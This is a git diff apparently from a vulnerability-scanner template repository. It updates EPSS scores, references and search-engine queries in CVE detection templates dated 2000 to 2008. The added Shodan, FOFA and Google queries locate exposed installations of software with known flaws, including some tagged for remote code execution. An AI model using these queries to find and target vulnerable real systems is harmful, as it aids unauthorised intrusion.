http/cves/2023/CVE-2023-26469.yaml | 6 ++--- http/cves/2023/CVE-2023-26842.yaml | 4 ++-- http/cves/2023/CVE-2023-26843.yaml | 4 ++-- http/cves/2023/CVE-2023-27008.yaml | 5 ++-- http/cves/2023/CVE-2023-27032.yaml | 6 ++--- http/cves/2023/CVE-2023-27034.yaml | 4 ++-- http/cves/2023/CVE-2023-27159.yaml | 6 +++-- http/cves/2023/CVE-2023-27179.yaml | 4 ++-- http/cves/2023/CVE-2023-27292.yaml | 4 +++- http/cves/2023/CVE-2023-2732.yaml | 4 ++-- http/cves/2023/CVE-2023-27350.yaml | 5 ++-- http/cves/2023/CVE-2023-27372.yaml | 5 ++-- http/cves/2023/CVE-2023-27482.yaml | 6 +++-- http/cves/2023/CVE-2023-27524.yaml | 5 ++-- http/cves/2023/CVE-2023-27587.yaml | 4 ++-- http/cves/2023/CVE-2023-27639.yaml | 4 ++-- http/cves/2023/CVE-2023-27640.yaml | 4 ++-- http/cves/2023/CVE-2023-2766.yaml | 5 ++-- http/cves/2023/CVE-2023-2779.yaml | 6 +++-- http/cves/2023/CVE-2023-2780.yaml | 8 +++++-- http/cves/2023/CVE-2023-27922.yaml | 6 +++-- http/cves/2023/CVE-2023-2796.yaml | 5 ++-- http/cves/2023/CVE-2023-28121.yaml | 6 +++-- http/cves/2023/CVE-2023-2813.yaml | 4 ++-- http/cves/2023/CVE-2023-2822.yaml | 5 ++-- http/cves/2023/CVE-2023-2825.yaml | 6 +++-- http/cves/2023/CVE-2023-28343.yaml | 6 +++-- http/cves/2023/CVE-2023-28432.yaml | 5 ++-- http/cves/2023/CVE-2023-28662.yaml | 5 ++-- http/cves/2023/CVE-2023-28665.yaml | 6 +++-- http/cves/2023/CVE-2023-29084.yaml | 4 ++-- http/cves/2023/CVE-2023-29298.yaml | 5 ++-- http/cves/2023/CVE-2023-29300.yaml | 5 ++-- http/cves/2023/CVE-2023-29357.yaml | 4 ++-- http/cves/2023/CVE-2023-29439.yaml | 6 +++-- http/cves/2023/CVE-2023-2948.yaml | 11 +++++---- http/cves/2023/CVE-2023-29489.yaml | 2 ++ http/cves/2023/CVE-2023-2949.yaml | 9 ++++---- http/cves/2023/CVE-2023-29622.yaml | 4 ++-- http/cves/2023/CVE-2023-29623.yaml | 4 ++-- http/cves/2023/CVE-2023-2982.yaml | 4 ++-- http/cves/2023/CVE-2023-29827.yaml | 4 ++-- http/cves/2023/CVE-2023-29887.yaml | 4 ++-- http/cves/2023/CVE-2023-29919.yaml | 8 +++---- http/cves/2023/CVE-2023-29922.yaml | 7 ++++-- http/cves/2023/CVE-2023-29923.yaml | 8 +++++-- http/cves/2023/CVE-2023-30013.yaml | 4 ++-- http/cves/2023/CVE-2023-30019.yaml | 4 ++-- http/cves/2023/CVE-2023-30150.yaml | 4 ++-- http/cves/2023/CVE-2023-30210.yaml | 4 ++-- http/cves/2023/CVE-2023-30212.yaml | 4 ++-- http/cves/2023/CVE-2023-30256.yaml | 5 ++-- http/cves/2023/CVE-2023-30258.yaml | 6 +++-- http/cves/2023/CVE-2023-30534.yaml | 4 +++- http/cves/2023/CVE-2023-30625.yaml | 4 ++-- http/cves/2023/CVE-2023-3077.yaml | 3 +-- http/cves/2023/CVE-2023-30777.yaml | 4 ++-- http/cves/2023/CVE-2023-30868.yaml | 4 ++-- http/cves/2023/CVE-2023-30943.yaml | 6 +++-- http/cves/2023/CVE-2023-31059.yaml | 5 ++-- http/cves/2023/CVE-2023-31446.yaml | 5 ++-- http/cves/2023/CVE-2023-31465.yaml | 5 ++-- http/cves/2023/CVE-2023-31548.yaml | 4 ++-- http/cves/2023/CVE-2023-32077.yaml | 7 +++--- http/cves/2023/CVE-2023-3219.yaml | 7 ++++-- http/cves/2023/CVE-2023-32243.yaml | 4 ++-- http/cves/2023/CVE-2023-32315.yaml | 6 +++-- http/cves/2023/CVE-2023-32563.yaml | 4 ++-- http/cves/2023/CVE-2023-33338.yaml | 4 ++-- http/cves/2023/CVE-2023-33405.yaml | 2 ++ http/cves/2023/CVE-2023-33439.yaml | 4 ++-- http/cves/2023/CVE-2023-33440.yaml | 5 ++-- http/cves/2023/CVE-2023-3345.yaml | 4 ++-- http/cves/2023/CVE-2023-33510.yaml | 5 ++-- http/cves/2023/CVE-2023-33568.yaml | 5 ++-- http/cves/2023/CVE-2023-33584.yaml | 4 ++-- http/cves/2023/CVE-2023-33629.yaml | 4 ++-- http/cves/2023/CVE-2023-3368.yaml | 4 ++-- http/cves/2023/CVE-2023-33831.yaml | 4 ++-- http/cves/2023/CVE-2023-34020.yaml | 10 +++++++- http/cves/2023/CVE-2023-34124.yaml | 5 ++-- http/cves/2023/CVE-2023-34259.yaml | 5 ++-- http/cves/2023/CVE-2023-34362.yaml | 5 ++-- http/cves/2023/CVE-2023-34537.yaml | 9 ++++++-- http/cves/2023/CVE-2023-34598.yaml | 4 ++-- http/cves/2023/CVE-2023-34599.yaml | 6 ++++- http/cves/2023/CVE-2023-3460.yaml | 6 +++-- http/cves/2023/CVE-2023-34659.yaml | 5 ++-- http/cves/2023/CVE-2023-34751.yaml | 4 ++-- http/cves/2023/CVE-2023-34752.yaml | 4 ++-- http/cves/2023/CVE-2023-34753.yaml | 4 ++-- http/cves/2023/CVE-2023-34755.yaml | 4 ++-- http/cves/2023/CVE-2023-34756.yaml | 4 ++-- http/cves/2023/CVE-2023-3479.yaml | 4 +++- http/cves/2023/CVE-2023-34843.yaml | 5 ++-- http/cves/2023/CVE-2023-34960.yaml | 4 ++-- http/cves/2023/CVE-2023-34993.yaml | 11 ++++++++- http/cves/2023/CVE-2023-35078.yaml | 4 ++-- http/cves/2023/CVE-2023-35082.yaml | 8 ++++--- http/cves/2023/CVE-2023-35158.yaml | 5 ++-- http/cves/2023/CVE-2023-35813.yaml | 6 +++-- http/cves/2023/CVE-2023-35843.yaml | 5 ++-- http/cves/2023/CVE-2023-35844.yaml | 2 ++ http/cves/2023/CVE-2023-35885.yaml | 7 +++--- http/cves/2023/CVE-2023-36144.yaml | 6 +++-- http/cves/2023/CVE-2023-36284.yaml | 7 +++--- http/cves/2023/CVE-2023-36287.yaml | 5 ++-- http/cves/2023/CVE-2023-36289.yaml | 5 ++-- http/cves/2023/CVE-2023-36306.yaml | 2 +- http/cves/2023/CVE-2023-36346.yaml | 4 ++-- http/cves/2023/CVE-2023-36347.yaml | 4 ++-- http/cves/2023/CVE-2023-36844.yaml | 8 +++---- http/cves/2023/CVE-2023-36845.yaml | 6 +++-- http/cves/2023/CVE-2023-36934.yaml | 5 ++-- http/cves/2023/CVE-2023-3710.yaml | 5 ++-- http/cves/2023/CVE-2023-37265.yaml | 4 ++-- http/cves/2023/CVE-2023-37266.yaml | 4 ++-- http/cves/2023/CVE-2023-37270.yaml | 6 +++-- http/cves/2023/CVE-2023-37462.yaml | 5 ++-- http/cves/2023/CVE-2023-37474.yaml | 7 ++++-- http/cves/2023/CVE-2023-37580.yaml | 4 ++-- http/cves/2023/CVE-2023-37629.yaml | 5 ++-- http/cves/2023/CVE-2023-3765.yaml | 6 +++-- http/cves/2023/CVE-2023-37679.yaml | 9 +++++--- http/cves/2023/CVE-2023-37728.yaml | 6 +++-- http/cves/2023/CVE-2023-37979.yaml | 4 +++- http/cves/2023/CVE-2023-38035.yaml | 5 ++-- http/cves/2023/CVE-2023-38203.yaml | 6 ++--- http/cves/2023/CVE-2023-38205.yaml | 5 ++-- http/cves/2023/CVE-2023-3836.yaml | 6 +++-- http/cves/2023/CVE-2023-3843.yaml | 2 +- http/cves/2023/CVE-2023-38433.yaml | 4 ++-- http/cves/2023/CVE-2023-3845.yaml | 2 +- http/cves/2023/CVE-2023-3847.yaml | 2 +- http/cves/2023/CVE-2023-3848.yaml | 4 ++-- http/cves/2023/CVE-2023-3849.yaml | 4 ++-- http/cves/2023/CVE-2023-38501.yaml | 6 +++-- http/cves/2023/CVE-2023-38646.yaml | 5 ++-- http/cves/2023/CVE-2023-38964.yaml | 5 ++-- http/cves/2023/CVE-2023-39002.yaml | 6 +++-- http/cves/2023/CVE-2023-39026.yaml | 10 ++++---- http/cves/2023/CVE-2023-39108.yaml | 7 ++++-- http/cves/2023/CVE-2023-39109.yaml | 6 +++-- http/cves/2023/CVE-2023-39110.yaml | 6 +++-- http/cves/2023/CVE-2023-39141.yaml | 8 +++++-- http/cves/2023/CVE-2023-39143.yaml | 5 ++-- http/cves/2023/CVE-2023-3936.yaml | 4 ++-- http/cves/2023/CVE-2023-39361.yaml | 6 +++-- http/cves/2023/CVE-2023-39598.yaml | 6 +++-- http/cves/2023/CVE-2023-39600.yaml | 6 +++-- http/cves/2023/CVE-2023-39676.yaml | 3 ++- http/cves/2023/CVE-2023-39677.yaml | 4 ++-- http/cves/2023/CVE-2023-39700.yaml | 4 +++- http/cves/2023/CVE-2023-39796.yaml | 4 ++-- http/cves/2023/CVE-2023-40208.yaml | 7 ++++-- http/cves/2023/CVE-2023-40355.yaml | 3 ++- http/cves/2023/CVE-2023-40779.yaml | 6 +++-- http/cves/2023/CVE-2023-4110.yaml | 2 +- http/cves/2023/CVE-2023-41109.yaml | 8 +++---- http/cves/2023/CVE-2023-4111.yaml | 2 +- http/cves/2023/CVE-2023-4112.yaml | 3 ++- http/cves/2023/CVE-2023-4113.yaml | 4 ++-- http/cves/2023/CVE-2023-4114.yaml | 4 ++-- http/cves/2023/CVE-2023-4115.yaml | 2 +- http/cves/2023/CVE-2023-4116.yaml | 3 ++- http/cves/2023/CVE-2023-41265.yaml | 6 +++-- http/cves/2023/CVE-2023-41266.yaml | 6 +++-- http/cves/2023/CVE-2023-4148.yaml | 6 +++-- http/cves/2023/CVE-2023-41538.yaml | 7 ++++-- http/cves/2023/CVE-2023-41642.yaml | 4 ++-- http/cves/2023/CVE-2023-4168.yaml | 4 ++-- http/cves/2023/CVE-2023-4169.yaml | 5 ++-- http/cves/2023/CVE-2023-4173.yaml | 5 ++-- http/cves/2023/CVE-2023-4174.yaml | 5 ++-- http/cves/2023/CVE-2023-41763.yaml | 5 ++-- http/cves/2023/CVE-2023-41892.yaml | 5 ++-- http/cves/2023/CVE-2023-42442.yaml | 6 +++-- http/cves/2023/CVE-2023-42793.yaml | 5 ++-- http/cves/2023/CVE-2023-43177.yaml | 6 +++-- http/cves/2023/CVE-2023-43187.yaml | 5 ++-- http/cves/2023/CVE-2023-43208.yaml | 8 ++++--- http/cves/2023/CVE-2023-43261.yaml | 8 +++---- http/cves/2023/CVE-2023-43325.yaml | 6 +++-- http/cves/2023/CVE-2023-43326.yaml | 6 +++-- http/cves/2023/CVE-2023-43374.yaml | 6 ++--- http/cves/2023/CVE-2023-43795.yaml | 5 ++-- http/cves/2023/CVE-2023-4415.yaml | 6 +++-- http/cves/2023/CVE-2023-44352.yaml | 2 ++ http/cves/2023/CVE-2023-44353.yaml | 9 +++++--- http/cves/2023/CVE-2023-4451.yaml | 5 ++-- http/cves/2023/CVE-2023-44812.yaml | 6 ++--- http/cves/2023/CVE-2023-44813.yaml | 6 +++-- http/cves/2023/CVE-2023-4521.yaml | 6 ++--- http/cves/2023/CVE-2023-45375.yaml | 7 +++--- http/cves/2023/CVE-2023-4542.yaml | 10 ++++---- http/cves/2023/CVE-2023-4547.yaml | 4 ++-- http/cves/2023/CVE-2023-45542.yaml | 4 +++- http/cves/2023/CVE-2023-45671.yaml | 8 ++++++- http/cves/2023/CVE-2023-4568.yaml | 6 +++-- http/cves/2023/CVE-2023-45852.yaml | 5 ++-- http/cves/2023/CVE-2023-45855.yaml | 6 +++-- http/cves/2023/CVE-2023-4596.yaml | 7 +++--- http/cves/2023/CVE-2023-4634.yaml | 6 +++-- http/cves/2023/CVE-2023-46347.yaml | 4 ++-- http/cves/2023/CVE-2023-46359.yaml | 13 +++++++++-- http/cves/2023/CVE-2023-46574.yaml | 6 +++-- http/cves/2023/CVE-2023-46747.yaml | 6 +++-- http/cves/2023/CVE-2023-46805.yaml | 8 ++++--- http/cves/2023/CVE-2023-4714.yaml | 4 ++-- http/cves/2023/CVE-2023-47211.yaml | 4 +++- http/cves/2023/CVE-2023-47218.yaml | 12 ++++++---- http/cves/2023/CVE-2023-47246.yaml | 4 ++-- http/cves/2023/CVE-2023-47643.yaml | 8 +++++-- http/cves/2023/CVE-2023-48084.yaml | 7 ++++-- http/cves/2023/CVE-2023-49070.yaml | 4 ++-- http/cves/2023/CVE-2023-49103.yaml | 2 ++ http/cves/2023/CVE-2023-4966.yaml | 6 +++-- http/cves/2023/CVE-2023-4973.yaml | 2 +- http/cves/2023/CVE-2023-4974.yaml | 5 ++-- http/cves/2023/CVE-2023-49785.yaml | 2 +- http/cves/2023/CVE-2023-5003.yaml | 8 +++---- http/cves/2023/CVE-2023-50290.yaml | 4 +++- http/cves/2023/CVE-2023-5074.yaml | 4 ++-- http/cves/2023/CVE-2023-5089.yaml | 6 +++-- http/cves/2023/CVE-2023-50917.yaml | 4 ++-- http/cves/2023/CVE-2023-50968.yaml | 4 ++-- http/cves/2023/CVE-2023-51467.yaml | 4 ++-- http/cves/2023/CVE-2023-52085.yaml | 3 ++- http/cves/2023/CVE-2023-5244.yaml | 5 ++-- http/cves/2023/CVE-2023-5360.yaml | 7 +++--- http/cves/2023/CVE-2023-5375.yaml | 4 ++-- http/cves/2023/CVE-2023-5556.yaml | 3 ++- http/cves/2023/CVE-2023-5830.yaml | 4 +++- http/cves/2023/CVE-2023-5914.yaml | 3 ++- http/cves/2023/CVE-2023-5991.yaml | 6 +++-- http/cves/2023/CVE-2023-6018.yaml | 4 +++- http/cves/2023/CVE-2023-6020.yaml | 3 ++- http/cves/2023/CVE-2023-6021.yaml | 3 ++- http/cves/2023/CVE-2023-6023.yaml | 4 +++- http/cves/2023/CVE-2023-6038.yaml | 8 ++++--- http/cves/2023/CVE-2023-6063.yaml | 4 +++- http/cves/2023/CVE-2023-6065.yaml | 4 ++-- http/cves/2023/CVE-2023-6114.yaml | 7 +++--- http/cves/2023/CVE-2023-6360.yaml | 2 +- http/cves/2023/CVE-2023-6379.yaml | 6 +++-- http/cves/2023/CVE-2023-6380.yaml | 4 +++- http/cves/2023/CVE-2023-6389.yaml | 4 +++- http/cves/2023/CVE-2023-6553.yaml | 4 +++- http/cves/2023/CVE-2023-6567.yaml | 2 ++ http/cves/2023/CVE-2023-6623.yaml | 2 ++ http/cves/2023/CVE-2023-6634.yaml | 6 +++-- http/cves/2023/CVE-2023-6831.yaml | 8 ++++--- http/cves/2023/CVE-2023-6875.yaml | 6 +++-- http/cves/2023/CVE-2023-6895.yaml | 8 +++++-- http/cves/2023/CVE-2023-6909.yaml | 6 +++-- http/cves/2023/CVE-2023-6977.yaml | 6 +++-- http/cves/2023/CVE-2023-6989.yaml | 9 +++++--- http/cves/2023/CVE-2023-7028.yaml | 17 +++++++++----- http/cves/2024/CVE-2024-0195.yaml | 7 +++--- http/cves/2024/CVE-2024-0200.yaml | 7 +++--- http/cves/2024/CVE-2024-0204.yaml | 2 +- http/cves/2024/CVE-2024-0235.yaml | 1 + http/cves/2024/CVE-2024-0305.yaml | 6 +++-- http/cves/2024/CVE-2024-0337.yaml | 2 +- http/cves/2024/CVE-2024-0352.yaml | 5 ++-- http/cves/2024/CVE-2024-0713.yaml | 1 + http/cves/2024/CVE-2024-1021.yaml | 1 + http/cves/2024/CVE-2024-1071.yaml | 2 +- http/cves/2024/CVE-2024-1208.yaml | 6 +++-- http/cves/2024/CVE-2024-1209.yaml | 6 +++++ http/cves/2024/CVE-2024-1210.yaml | 6 +++++ http/cves/2024/CVE-2024-1561.yaml | 6 ++--- http/cves/2024/CVE-2024-1709.yaml | 6 ++++- http/cves/2024/CVE-2024-20767.yaml | 6 +++-- http/cves/2024/CVE-2024-21644.yaml | 8 +++++-- http/cves/2024/CVE-2024-21645.yaml | 3 +++ http/cves/2024/CVE-2024-21683.yaml | 3 +-- http/cves/2024/CVE-2024-21887.yaml | 8 ++++--- http/cves/2024/CVE-2024-21893.yaml | 2 ++ http/cves/2024/CVE-2024-22024.yaml | 3 ++- http/cves/2024/CVE-2024-22319.yaml | 4 ++-- http/cves/2024/CVE-2024-22927.yaml | 4 ++-- http/cves/2024/CVE-2024-2340.yaml | 4 ++-- http/cves/2024/CVE-2024-23917.yaml | 4 +++- http/cves/2024/CVE-2024-24131.yaml | 4 +++- http/cves/2024/CVE-2024-24919.yaml | 4 ++-- http/cves/2024/CVE-2024-25735.yaml | 6 +++++ http/cves/2024/CVE-2024-26331.yaml | 34 ++++++++++++++++------------ http/cves/2024/CVE-2024-27198.yaml | 2 ++ http/cves/2024/CVE-2024-27956.yaml | 4 ++-- http/cves/2024/CVE-2024-28255.yaml | 6 ++--- http/cves/2024/CVE-2024-28734.yaml | 2 +- http/cves/2024/CVE-2024-2879.yaml | 15 +++++++----- http/cves/2024/CVE-2024-29059.yaml | 9 +++++--- http/cves/2024/CVE-2024-29269.yaml | 5 ++++ http/cves/2024/CVE-2024-3097.yaml | 6 +++-- http/cves/2024/CVE-2024-3136.yaml | 7 +++--- http/cves/2024/CVE-2024-31848.yaml | 6 ++--- http/cves/2024/CVE-2024-31849.yaml | 7 +++--- http/cves/2024/CVE-2024-31850.yaml | 6 ++--- http/cves/2024/CVE-2024-32399.yaml | 4 ++-- http/cves/2024/CVE-2024-3273.yaml | 14 +++++++----- http/cves/2024/CVE-2024-33575.yaml | 6 +++-- http/cves/2024/CVE-2024-33724.yaml | 1 + http/cves/2024/CVE-2024-3400.yaml | 18 ++++++++------- http/cves/2024/CVE-2024-4040.yaml | 2 +- http/cves/2024/CVE-2024-4348.yaml | 5 ++++ 1814 files changed, 4615 insertions(+), 2565 deletions(-) diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index 1017ec6d7c..721f26cc51 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -20,12 +20,13 @@ info: cve-id: CVE-2000-0114 cwe-id: NVD-CWE-Other epss-score: 0.15958 - epss-percentile: 0.95829 + epss-percentile: 0.95958 cpe: cpe:2.3:a:microsoft:internet_information_server:3.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microsoft product: internet_information_server + shodan-query: cpe:"cpe:2.3:a:microsoft:internet_information_server" tags: cve,cve2000,frontpage,microsoft,edb http: diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index 57d6042605..b05800361d 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2001-0537 cwe-id: CWE-287 epss-score: 0.87683 - epss-percentile: 0.98569 + epss-percentile: 0.98644 cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 0949ff5738..872aa5b0f5 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -27,6 +27,9 @@ info: max-request: 5 vendor: squirrelmail product: squirrelmail + shodan-query: http.title:"squirrelmail" + fofa-query: title="squirrelmail" + google-query: intitle:"squirrelmail" tags: cve,cve2002,edb,xss,squirrelmail http: diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index c1f874a540..6da7d480f3 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -15,13 +15,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2004-1965 - http://marc.info/?l=bugtraq&m=108301983206107&w=2 - https://exchange.xforce.ibmcloud.com/vulnerabilities/15966 + - https://github.com/POORVAJA-195/Nuclei-Analysis-main classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2004-1965 cwe-id: NVD-CWE-Other epss-score: 0.0113 - epss-percentile: 0.84351 + epss-percentile: 0.84626 cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index 89f0e31e60..18423be5d9 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml @@ -20,8 +20,8 @@ info: cvss-score: 10 cve-id: CVE-2005-3344 cwe-id: NVD-CWE-Other - epss-score: 0.02158 - epss-percentile: 0.88203 + epss-score: 0.01539 + epss-percentile: 0.87085 cpe: cpe:2.3:a:horde:horde:3.0.4:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index 4488b0a43c..0096019484 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -23,13 +23,14 @@ info: cve-id: CVE-2005-3634 cwe-id: NVD-CWE-Other epss-score: 0.02843 - epss-percentile: 0.897 + epss-percentile: 0.90695 cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sap product: sap_web_application_server shodan-query: html:"SAP Business Server Pages Team" + fofa-query: body="sap business server pages team" tags: cve,cve2005,sap,redirect,business,xss http: diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index 87657dbf27..e395c6e2c0 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -20,13 +20,16 @@ info: cvss-score: 7.5 cve-id: CVE-2006-2842 cwe-id: CWE-22 - epss-score: 0.25691 - epss-percentile: 0.9628 + epss-score: 0.28102 + epss-percentile: 0.96839 cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: squirrelmail product: squirrelmail + shodan-query: http.title:"squirrelmail" + fofa-query: title="squirrelmail" + google-query: intitle:"squirrelmail" tags: cve,cve2006,lfi,squirrelmail,edb http: diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index f3c5829a6c..6c0e74c380 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2007-0885 cwe-id: NVD-CWE-Other epss-score: 0.0093 - epss-percentile: 0.82626 + epss-percentile: 0.82973 cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-3010.yaml b/http/cves/2007/CVE-2007-3010.yaml index 1a29f75867..df6e5d5321 100644 --- a/http/cves/2007/CVE-2007-3010.yaml +++ b/http/cves/2007/CVE-2007-3010.yaml @@ -21,8 +21,8 @@ info: cvss-score: 10 cve-id: CVE-2007-3010 cwe-id: CWE-20 - epss-score: 0.97317 - epss-percentile: 0.99868 + epss-score: 0.97313 + epss-percentile: 0.99874 cpe: cpe:2.3:a:alcatel-lucent:omnipcx:7.1:*:enterprise:*:*:*:*:* metadata: verified: true @@ -31,6 +31,7 @@ info: product: omnipcx shodan-query: title:"OmniPCX for Enterprise" fofa-query: app="Alcatel_Lucent-OmniPCX-Enterprise" + google-query: intitle:"omnipcx for enterprise" tags: cve,cve2007,kev,rce,alcatel http: diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index a2a1196510..90debd42bc 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2007-4504 cwe-id: CWE-22 - epss-score: 0.02599 - epss-percentile: 0.90043 + epss-score: 0.02171 + epss-percentile: 0.89338 cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index aee2258ec2..baf5a3a9e8 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.8 cve-id: CVE-2007-4556 cwe-id: NVD-CWE-Other - epss-score: 0.16469 - epss-percentile: 0.95873 + epss-score: 0.21361 + epss-percentile: 0.96419 cpe: cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index fe0f7b48ec..b69164999f 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -28,6 +28,8 @@ info: vendor: phppgadmin product: phppgadmin shodan-query: http.title:"phpPgAdmin" + fofa-query: title=phppgadmin + google-query: intitle:phppgadmin tags: cve2007,cve,xss,pgadmin,phppgadmin,edb http: diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index b395ef595b..a08f7e1a9d 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -22,14 +22,13 @@ info: cve-id: CVE-2008-1061 cwe-id: CWE-79 epss-score: 0.00663 - epss-percentile: 0.77516 + epss-percentile: 0.7961 cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wordpress product: sniplets_plugin tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets - flow: http(1) && http(2) http: diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index 95335e8942..74805a9031 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -29,6 +29,8 @@ info: vendor: microsoft product: exchange_server shodan-query: http.title:"Outlook" + fofa-query: title="outlook" + google-query: intitle:"outlook" tags: cve2008,cve,redirect,owa,exchange,microsoft http: diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index 28a0666dd5..ba625d56d3 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -28,6 +28,7 @@ info: max-request: 1 vendor: cmsimple product: cmsimple + shodan-query: cpe:"cpe:2.3:a:cmsimple:cmsimple" tags: cve,cve2008,lfi,cmsimple http: diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index 0bce7f19c4..05e6784266 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5 cve-id: CVE-2008-4764 cwe-id: CWE-22 - epss-score: 0.02365 - epss-percentile: 0.89577 + epss-score: 0.02135 + epss-percentile: 0.89239 cpe: cpe:2.3:a:extplorer:com_extplorer:*:rc2:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index 90bcd16ae0..dd7008fd98 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2008-5587 cwe-id: CWE-22 epss-score: 0.02331 - epss-percentile: 0.88625 + epss-percentile: 0.89734 cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: phppgadmin product: phppgadmin shodan-query: http.title:"phpPgAdmin" + fofa-query: title=phppgadmin + google-query: intitle:phppgadmin tags: cve,cve2008,lfi,phppgadmin,edb http: diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index cf7fc02a6b..1516da4d0f 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-6080 cwe-id: CWE-22 epss-score: 0.03314 - epss-percentile: 0.90395 + epss-percentile: 0.9132 cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index 4ae86e833b..428278c7bc 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-6172 cwe-id: CWE-22 epss-score: 0.00509 - epss-percentile: 0.76096 + epss-percentile: 0.76498 cpe: cpe:2.3:a:weberr:rwcards:3.0.11:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index b7f61b6a45..ccaa6b1020 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -13,13 +13,14 @@ info: - https://www.exploit-db.com/exploits/6980 - https://nvd.nist.gov/vuln/detail/CVE-2008-6222 - https://exchange.xforce.ibmcloud.com/vulnerabilities/46356 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2008-6222 cwe-id: CWE-22 - epss-score: 0.01029 - epss-percentile: 0.82175 + epss-score: 0.01302 + epss-percentile: 0.85861 cpe: 